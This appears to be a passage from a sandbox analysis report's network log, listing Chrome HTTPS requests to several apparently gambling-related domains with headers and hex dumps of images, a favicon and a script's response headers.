                                                                                                                                                          Data Ascii: HOvn3FWJL1K6Gn7LD12Xm1VV5S/5uiP9V6YcC9YlcLARUUugC2Tg9Ef/hHCoE3GscPOYnRX9pFW7uVge7ut4333VkIJVuYwYwCMPSUPG2TbahMDxmLNvm1szcbyYihUCqAGziw35q3YfKoWcJTLD3c2iVEsXepjGPR49iZWLvG5m5hK3ok0GP5faj6RbsvidxI+sAWHhwEybYLMB1Gj9TE6yYURsJu0iFJFYv2yW+PUljfz/hMgqosUFYnCFPKs
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 41 50 42 66 33 4f 6a 6f 76 61 63 49 53 45 5a 31 79 34 65 6c 78 6b 74 73 4c 54 62 56 6f 76 70 35 78 4b 73 36 75 78 66 57 36 48 4a 6d 46 4c 72 4b 67 62 76 32 63 71 36 2b 77 52 58 34 78 70 58 56 59 4a 64 53 62 33 54 68 35 48 6b 45 42 73 72 5a 35 37 43 44 5a 6e 47 34 47 6e 6b 68 78 44 34 53 2b 70 73 76 33 4f 4a 61 33 45 66 79 36 44 70 75 4a 6e 6b 37 2b 53 61 2f 6a 78 71 65 35 77 47 72 32 4b 6a 52 5a 34 69 47 48 73 58 77 39 65 45 31 6a 6e 51 35 36 5a 63 47 4b 6c 6c 7a 54 4c 31 62 36 71 6c 52 57 7a 6e 41 47 76 4f 64 34 58 43 45 38 75 64 35 36 4f 72 63 65 64 72 6e 6d 35 32 50 76 33 4b 46 35 33 75 64 72 6e 58 4c 73 35 66 31 47 46 35 79 57 63 50 6e 6f 56 78 65 6d 73 58 39 54 62 53 45 65 58 65 35 77 2b 63 74 42 74 39 50 2f 52 35 41 36 69 58 37 75 33 64 4c 51 6e 4c
                                                                                                                                                          Data Ascii: APBf3OjovacISEZ1y4elxktsLTbVovp5xKs6uxfW6HJmFLrKgbv2cq6+wRX4xpXVYJdSb3Th5HkEBsrZ57CDZnG4GnkhxD4S+psv3OJa3Efy6DpuJnk7+Sa/jxqe5wGr2KjRZ4iGHsXw9eE1jnQ56ZcGKllzTL1b6qlRWznAGvOd4XCE8ud56Orcedrnm52Pv3KF53udrnXLs5f1GF5yWcPnoVxemsX9TbSEeXe5w+ctBt9P/R5A6iX7u3dLQnL
                                                                                                                                                          2024-06-09 22:41:02 UTC772INData Raw: 52 37 59 41 6b 54 72 59 4d 46 41 57 57 55 36 68 42 51 47 32 67 61 67 43 69 67 68 77 45 59 4a 71 68 41 41 42 53 66 77 43 53 79 74 74 41 43 61 53 51 44 74 38 63 74 41 6b 4d 6a 31 6c 5a 34 67 6d 56 49 4b 2f 6d 6b 65 77 45 49 42 31 38 63 71 67 33 4d 37 50 69 37 4d 34 52 55 57 63 63 67 42 4e 6b 33 4c 6e 4d 41 58 67 43 66 79 33 2b 6b 64 6b 75 54 41 2f 79 77 42 6c 39 6b 2f 2b 55 34 41 4b 52 56 41 4b 6b 42 56 65 6f 4d 42 57 55 41 43 42 58 38 30 36 42 57 42 43 67 63 55 62 6b 73 4e 6d 4f 41 52 42 57 54 30 5a 42 57 36 4b 7a 6f 44 6f 4b 74 72 42 48 30 6b 59 44 54 55 4c 45 6c 47 4b 6f 75 6b 41 34 4a 63 41 6a 69 2b 4b 67 56 6b 61 2b 6e 4e 4d 2b 2b 6d 36 4d 35 73 56 47 6b 58 30 6c 56 4d 77 77 6d 48 64 53 42 55 50 30 7a 62 6a 43 41 43 57 44 43 67 64 45 41 6a 30 35 78 37
                                                                                                                                                          Data Ascii: R7YAkTrYMFAWWU6hBQG2gagCighwEYJqhAABSfwCSyttACaSQDt8ctAkMj1lZ4gmVIK/mkewEIB18cqg3M7Pi7M4RUWccgBNk3LnMAXgCfy3+kdkuTA/ywBl9k/+U4AKRVAKkBVeoMBWUACBX806BWBCgcUbksNmOARBWT0ZBW6KzoDoKtrBH0kYDTULElGKoukA4JcAji+KgVka+nNM++m6M5sVGkX0lVMwwmHdSBUP0zbjCACWDCgdEAj05x7


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          247192.168.2.549988202.61.87.2194434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:02 UTC593OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: yh8613.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:41:02 UTC360INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:02 GMT
                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                          Content-Length: 140
                                                                                                                                                          Connection: close
                                                                                                                                                          Last-Modified: Wed, 27 Jun 2018 09:11:10 GMT
                                                                                                                                                          ETag: "5b3354ae-8c"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: EXPIRED
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:02 UTC140INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 2e 49 44 41 54 78 da ec ce 31 01 00 00 08 03 a0 69 ff ce 33 86 0f 24 60 da e6 d3 e6 99 80 80 80 80 80 80 80 80 80 80 80 80 80 80 c0 09 30 00 40 b4 03 3d e3 0a 67 49 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<.IDATx1i3$`0@=gIIENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          248192.168.2.55000023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:02 UTC639OUTGET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC618INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:02 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 20027
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4e3b"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[14],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,12],EU-FRA-paris-GLOBAL1-CACHE18[4],EU-FRA-paris-GLOBAL1-CACHE8[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2524002
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3e18727977cffdd21994285d9e4d6e00
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 67998
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15766INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:03 UTC4261INData Raw: bc 12 6c ec 17 7c 8f 27 6f 22 f1 ac 4c 89 1c d3 ed 3e 39 67 7d c5 23 67 e8 02 fd 06 bd 7a d0 81 eb 40 b9 74 2e 13 89 a8 d7 4b 44 28 9e 74 7d c4 4b 07 28 c3 7d 95 f6 36 ea ca 38 d8 2d 9e 46 38 5d 2d f7 06 96 38 a4 b4 b9 0b e3 ae e8 24 0a 01 ee 8c b4 fa 4e 9b 4b b6 df a0 c1 3f cb df c4 7d 35 1e ee de ed af bc 83 1c eb 2c 1d e7 26 b5 cf d8 70 dc e6 2e ef 2d 3e 65 1f fe 1d c8 5a da 49 23 5e 47 18 7d e4 c6 8a 77 00 11 b7 32 fd 20 ab 03 4d a7 42 b7 56 c8 62 cd d2 a7 1c 7e 1c bf 6f 1c 6b 9a c7 9d 1e 5a 9d 47 87 3f 67 d0 6a 0f 92 fb 73 ca 78 56 54 db c7 c4 72 36 d6 bc a7 f4 70 b7 f7 56 d3 23 5a ba d1 4c 31 23 20 dd e3 0d 58 c0 20 28 24 93 50 34 1e 6d a6 3a ad 3a b1 f0 22 17 9b 1f 6f 33 4e 0b 77 00 8b ca 40 f1 04 6a e4 3f f4 a7 3c 6b da ae 67 77 6f 24 98 be 25 9c
                                                                                                                                                          Data Ascii: l|'o"L>9g}#gz@t.KD(t}K(}68-F8]-8$NK?}5,&p.->eZI#^G}w2 MBVb~okZG?gjsxVTr6pV#ZL1# X ($P4m::"o3Nw@j?<kgwo$%


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          249192.168.2.55000123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:02 UTC635OUTGET /pc/image-pc/video/og_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:02 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15676
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d3c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[4],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE2[3],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2489242
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a9460333a1a4282a6c89a11c692a6671
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 102758
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15676INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          250192.168.2.55000223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:02 UTC635OUTGET /pc/image-pc/video/gd_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:02 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17264
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4370"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE9[3],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2524002
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: eb3c192edfbb7dadf4b416fc4c4ef812
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 67998
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15768INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:03 UTC1496INData Raw: 1c 3b f1 4d 2b b3 2a 91 20 69 8c 70 00 70 0f 8f 79 3c 4f 1e e5 6a f1 cf 79 b8 9f 13 cc 66 ae 71 b6 d9 db eb 7e 65 77 94 93 90 de dd ac 20 e3 ed 32 9b bb b0 63 6c 56 e1 a3 69 24 64 b7 69 66 79 54 b8 89 63 0a 80 6e 34 2b 6d 95 6b 42 22 46 23 40 0c cf 89 8f 19 49 9d bd 4c 00 c1 df 1c 95 fa 3b 8d 2a 32 26 22 47 51 2e ed 80 97 08 87 ff 00 4b 92 71 66 c1 04 c1 f3 6e 0b 63 cb f2 99 63 61 c8 79 1e 36 f7 8a 5c 61 f2 77 57 b2 ad bd ee 57 23 76 9d b9 ae 2e a4 92 e6 f0 5b 23 2b 6d 1d b6 90 80 ab 45 a9 34 b2 6d 2b ce 90 8b c6 24 4c 10 de 98 81 c0 61 17 f9 2a f1 ba a3 1a a6 4d 22 0c 08 2f 9c 89 e3 99 6f 9f 72 98 e0 f3 56 37 79 8e 2f 90 9b 15 2d be 0e cf 87 cd c5 f3 c6 58 94 ed 59 cd d1 32 59 43 24 a4 c8 b1 19 91 97 ba ea 5b 69 52 56 bb b4 f3 b3 9e 89 87 f3 19 eb 1e 0d
                                                                                                                                                          Data Ascii: ;M+* ippy<Ojyfq~ew 2clVi$difyTcn4+mkB"F#@IL;*2&"GQ.Kqfnccay6\awWW#v.[#+mE4m+$La*M"/orV7y/-XY2YC$[iRV


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          251192.168.2.55000323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:02 UTC635OUTGET /pc/image-pc/video/gc_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:02 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 25956
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-6564"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[6],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,5],EU-FRA-paris-GLOBAL1-CACHE21[4],EU-FRA-paris-GLOBAL1-CACHE15[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2524002
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 65836b71498888008067f579bb620309
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 67998
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15767INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:03 UTC10189INData Raw: e5 69 55 90 39 81 eb 5f 43 4d 5d 3c f6 17 24 fc d5 59 d8 b6 b2 81 b6 ab 86 e3 d8 18 b6 dd 96 fd ad ae d3 6d 93 dc 52 00 14 a5 0d 78 70 e7 a3 b1 26 df 1d 9c d4 76 6c 3b 3e 78 c5 ad 4c f6 bc f6 f7 6e 60 30 cb 9c 93 40 b2 a2 28 3e cf 5d 2a 4c 58 9d ae 68 35 ce 96 35 b6 94 a5 59 a6 4f 73 2b 66 3a d4 a7 5d 49 0b 29 2a 21 20 f0 24 0f 43 af 79 11 28 1b b4 14 a4 cc c9 98 ed 4e b4 dd 1b 07 c8 2e af a5 6e a1 c4 97 d4 54 b7 14 0a 97 c4 fe 2a 9a 73 d3 de 7c 48 a6 c4 69 4f 26 24 8c 6e e7 53 e3 5b 26 e0 37 4b 74 e8 b6 e5 05 39 f3 b2 18 88 1d 0d d3 b6 a9 4e a1 a4 a8 fa 10 3a f4 85 c9 57 53 27 b0 53 73 62 48 b3 28 1a a9 61 f4 6b 4e 10 e4 39 16 43 12 5a 34 71 85 a5 d4 1f f3 24 83 c6 be 87 43 b8 04 10 7a 1a a2 c7 2b 43 2a ca bf 59 58 1f c9 53 a4 3b bd ae f7 6a 33 6e 12 db
                                                                                                                                                          Data Ascii: iU9_CM]<$YmRxp&vl;>xLn`0@(>]*LXh55YOs+f:]I)*! $Cy(N.nT*s|HiO&$nS[&7Kt9N:WS'SsbH(akN9CZ4q$Cz+C*YXS;j3n


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          252192.168.2.54998238.174.148.2344434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:02 UTC539OUTGET /message_zh_CN.js?v=1716975949157 HTTP/1.1
                                                                                                                                                          Host: e933002.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:03 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:03 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 30 32 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:02 GMT
